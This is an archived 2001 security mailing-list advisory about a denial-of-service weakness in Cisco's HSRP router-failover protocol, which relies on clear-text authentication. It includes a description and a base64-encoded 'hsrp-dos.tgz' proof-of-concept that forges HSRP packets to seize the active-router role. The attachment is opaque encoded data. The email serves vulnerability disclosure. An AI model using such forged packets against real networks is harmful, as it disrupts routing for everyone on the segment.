Date: Thu, 3 May 2001 19:57:41 +0200
From: bashis <bash@NS.WCD.SE.>
To: [email protected]Subject: Cisco HSRP Weakness/DoS
--%--multipart-mixed-boundary-1.5498.988912661--%
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi
I was playing with Cisco's HSRP (Hot Standby Routing Protocol),
and there is a (major) weakness in that protocol that allow
any host in a LAN segment to make a HSRP DoS.
Short (very) explain of HSRP.
HSRP uses UDP on port 1985 to multicast address 224.0.0.2,
and the authentication is in clear text. (default: cisco)
I include a small program that sends out a fake HSRP packet,
when it hear a legal HSRP packet, as a "proof of concept" code...
Vendor was notified about this 14 April 2001,,
and their response was to use HSRP with IPSec.
http://www.cisco.com/networkers/nw00/pres/2402.pdf
[cut from src]
/*
* Description:
* This code listen for any HSRP packet, when it hear one HSRP packet,
* it capture this, modifies some of HSRP protocol parameters, and send out
* a fake HSRP packet that tells other routers that I am the active router,
* I have highest priority and you should be 'Standby' or silent..
*
* If the other active, and legal router has highest possible
* priority (255), then they will fight.. ;-) , AND it seems
* in my tests that the legal router who 'wishes' be active router,
* IS allready active, so no DoS will occure. (only UDP flood from both)
*/
--
\0x62\0x61\0x73\0x68\0x69\0x73
--%--multipart-mixed-boundary-1.5498.988912661--%
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Description: gzip compressed data, deflated, last modified: Thu May 3 20:02:56 2001, os: Unix
Content-Disposition: attachment; filename="hsrp-dos.tgz"
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
--%--multipart-mixed-boundary-1.5498.988912661--%--
